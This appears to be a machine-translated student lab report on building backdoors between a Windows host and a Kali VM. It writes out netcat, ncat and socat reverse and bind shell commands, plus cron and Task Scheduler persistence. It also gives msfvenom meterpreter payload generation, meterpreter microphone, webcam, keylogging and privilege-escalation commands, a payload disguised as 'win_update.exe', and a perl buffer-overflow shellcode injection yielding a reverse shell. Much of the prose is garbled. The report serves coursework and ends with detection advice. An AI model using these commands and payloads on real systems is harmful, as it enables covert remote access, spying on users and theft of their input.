First, the test target
1.1 test requirements
- Nc achieved using the back door between the win, mac, Linux connection
- meterpreter applications
- MSF POST application module
1.2 Experimental content
- Use netcat get the host operating Shell, cron start
- Use socat get the host operating Shell, plans to start the task
- Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell
- Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right
- Alternatively points: Using the MSF generate the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
Second, the experimental preparation
2.1 turn off the firewall
2.1.1 Host
2.1.2 virtual machine
kali turn off the firewall, will use the command ufw, the initial use will need to install, apt-get install ufw, close to ufw disable, open to ufw enable.
2.2 ncat&socat
nc aka netcat, ncat, a bottom tool, the basic TCP, UDP data transmitting and receiving, is often used in conjunction with other tools, play the role of the back door. Linux and Mac systems often comes nc, Windows system will need to download.
socat is a versatile network tools under Linux, is the reason behind the name Socket CAT, similar functions and Netcat, Netcat can be seen as an enhanced version.
Host 2.2.1 Download ncat & socat
Download Netcat and Socat file and unzip into the appropriate folder, and run ncat socat.exe in cmd interface, if prompted, the installation was successful.
2.2.2 Win obtain Linux Shell
Enter cmd ipconfig query in the host IP address of its host.
IP address of the host to 192.168.0.100
Use ncat listens port 4304 of the machine, inputs ncat -l -p 4304
Kali performed rebound port 4304 connected to the end of the windows, nc 192.168.0.100 4304 -e / bin / sh
Back to the host cmd, enter the ls command, windows get kali's Shell
2.2.3 Linux get Win Shell
Enter ip add a virtual machine kali command line to query the virtual machine IP address
Virtual machine IP address is 192.168.124.129
In the command line to run the virtual machine kali interception instruction nc the -l -p 4304
On the host side, the rebound kali connection port 4304, an input command ncat -e cmd.exe 192.168.124.129 4304 cmd in
Back to the virtual machine can be found to get the windows shell Linux
2.2.4 nc data transmission
windows running the Listener command ncat -l 4304 listens port 4304
kali rebound connection port 4304, operation command nc 192.168.0.100 4304
Enter after typing the host cmd to display the same, typing cmd carriage return after the virtual machine will display the command line
2.2.5 transfer files using ncat
Monitor native host port 4304, and store the received data into 4304.txt, cmd enter ncat -l 4304> 4304.txt
First created in kali in 4304.txt files, kali rebound port to connect to Windows 4304, and will end kali past 4304.txt file transfer, terminal input nc 192.168.0.100 4304 <4304.txt
2.3 Meter Preter
Is a backdoor program.
The traditional understanding is: someone to write a backdoor, we make use of them.
Later, some cattle do, wanted to write a platform to generate backdoors.
This platform does, the basic functions of the back door, extensions, encoding, operating platform and operating parameters, all made of parts or adjustable parameters.
When used in combination as needed, you can generate an executable file.
Third, the experimental process
3.1 Use netcat get the host operating Shell, cron start
Open listening 4304 port, cmd, enter the command ncat.exe -l 4304 in windows
Kali virtual machine terminal, an input command to edit task crontab -e, the crontab a timing task, -e represents editing, the editor select the third entry,
Add 30 * * * * / bin / netcat last line 192.168.0.100 4304 -e / bin / sh, i.e., the first 30 minutes of each hour Windows hosts reverse connection port 4304
Save and exit, enter the command crontab -l to confirm the save, the time after the input command ls in cmd can be found already obtained shell
3.2 Use Socat get the host operating Shell, plans to start the task
When> Administrative Tools, click create a task in Task Scheduler, select the Triggers tab, click New, will begin the task set to Station Lock - In Windows, open the Control Panel -> System and Security
When you click OK in operation -> New -> select a program or script path socat.exe file, add the parameter field fill tcp-listen: 4304 exec: the role of cmd.exe, pty, stderr, this order is the cmd.exe bind to port 4304, while the cmd.exe redirect the stderr to stdout
Then the implementation of the trigger condition, use win + l make the screen lock screen, so that the condition is triggered. Cmd performed to obtain a page, the page is not closed, into the page input kali socat - tcp: 192.168.0.100: 4304, where the first parameter - represent standard input and output, the second port is connected to a Windows 4304 represents a host, this when you can find that has successfully obtained a cmd shell
Back to the task program library program, the task is running off, let it return to the ready state
3.3 Use MSF meterpreter an executable file, and transmitted to the host using ncat acquired host running Shell
Run command msfvenom -p windows in kali terminal / meterpreter / reverse_tcp LHOST = 192.168.124.129 LPORT = 4304 -f exe> 20174304_backdoor.exe
The command is executed successfully, it will generate a backdoor executable program: 20174304_backdoor.exe
In the Windows command line, enter ncat directory, execute the command ncat.exe -l 4304> 20174304_backdoor.exe, the host goes into receive mode file
Kali execute command nc 192.168.0.100 4304 <20174304_backdoor.exe, the newly generated file transmitted from the host to kali
kali enter msfconsole, enter MSF console
use exploit / multi / handler using the monitor module
set payload windows / meterpreter / reverse_tcp, use the same payload generating backdoor
set LHOST 192.168.124.129, Kali the IP, and generating the designated IP backdoor same
set LPORT 4304, using the same port
Finally, enter the exploit setup is complete, start listening
Double-click the file to open 20174304_backdoor.exe, back to the virtual machine, use ipconfig to verify that the virtual machine has been acquired by the windows shell
3.4 MSF meterpreter generated content acquisition target host audio, camera, keyloggers, etc., and try to put right
3.4.1 Use record_mic instructions can intercept an audio
3.4.2 Use webcam_snap instructions may use the camera for photographing
3.4.3 screenshot screen instructions can be cut
3.4.4 Input keyscan_start start recording the keystroke input keyscan_dump instruction to read the recording of keystrokes (not the first pass input)
3.4.5 Use getuid command to view the current user, use the instructions mention the right getsystem
Error failed to mention the right environment
After the Internet to find and reference Zhang Bo classmates blog that a basic understanding of the reasons
First input msfconsole, MSF enter command line, the following steps:
Input use exploit / multi / handler, obtaining multi / hander module
Input use exploit / windows / local / ask
Enter the set payload windows / meterpreter / reverse_tcp, designated payload
Enter the set lhost 192.168.124.129
输入set filename win_update.exe
Input set session 1, session number setting
Input options, you can view the current settings in Windows / local / ask the following
Continue to enter exploit, just execute the resulting file win_update.exe
Still fails, there is no reason to find
3.5 plus optional content: MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell
First, prepare some Shellcode
And change some settings
Next, use perl to prepare us to enter into pwn4304 in hexadecimal number, instruction
perl -e 'print "A" x 32;print"\x**\x**\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_04
Next we determined \ x ** \ x ** in the end what to fill in. Open a terminal inject this attack buf: (cat input_04; cat) | ./pwn4304
In addition to open a terminal, use gdb debugging pwn4304 this process:
1. Locate the process ID of pwn4304
Process number: 1590
2. Start the gdb debugging process
3. by setting breakpoints, view memory address buf injection
Find a breakpoint in 0x080484ae
Input break * 0x080484ae set breakpoints, in another terminal press Enter, Back gdb terminal, input info r esp, stack pointer view
Position after 0xffffd6ac, then shellcode in the upper 4-byte addresses, i.e. 0xffffd6b0, shellcode succeeded in finding the starting address of the original data file to be modified
perl -e 'print "A" x 32;print"\xb0\xd6\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_4304
After modifying the input to the pwn4304
Then enter msfconsole in another terminal, and open the monitor.
exploit use / Multi / Handler
the SET payload Linux / x86 / shell_reverse_tcp
the SET lhost 127.0.0.1
the SET LPORT 4444 // Both are based on the specified content shellcode to choose.
Options Show
exploit
Enter the command (cat input_4304; cat) in the original terminal | ./pwn4304, and then press Enter, at the other end you can get a shell start running
Fourth, thinking and summary
4.1 basic questions answered
Example you can think of possible ways to enter a backdoor on your system?
Installation unsafe, pirated software, download files of unknown origin
How do you know that exemplified the back door to start up (win and linux) way?
Windows: since the start-up or disguised to lure users to take the initiative to start
Linux: inject shellcode, crontab time to start
Which gives you a deep mapping function Meterpreter there?
Use the host's microphone, a camera, a screenshot of the home page to get keyboard input records and provide the right
How to find yourself the system has not been installed back door?
See if there is an open port anomaly; regular use of anti-virus software to detect; Task Manager to see whether the abnormal process; to see whether the abnormal since the start of the program and other
4.2 Summary and experimental experience
The trial compared to previous experiments to be simpler, just need to do some short, consecutive instructions, provide the right part of the back and the difficulties of doing content is relatively large, it took a long time, seen a lot of people blog, is rather reluctant to do it, especially in two of the last step, done many, many times. The fourth section mention the right, saw Zhang Bo classmates blog, did so again, but still stuck to draw up the final step, read online said win10 too, do not know the true and false; selected as the content needs the experiment used a knowledge, incidentally, can review and consolidate previous knowledge about the operation and, as the final step and experiment a time to do a lot of times is still a segment often wrong, then restart separated for a period of time on it. Greatest achievement test network security, I turn off the firewall still so difficult to do, those hackers is too strong, easy to use backdoor vulnerability to attack, but also reminds us that there must be security conscious, regularly killing virus , fixing bugs, unsafe things must not be opened. I hope to be able to acquire knowledge and methods more defensive back door patched vulnerabilities.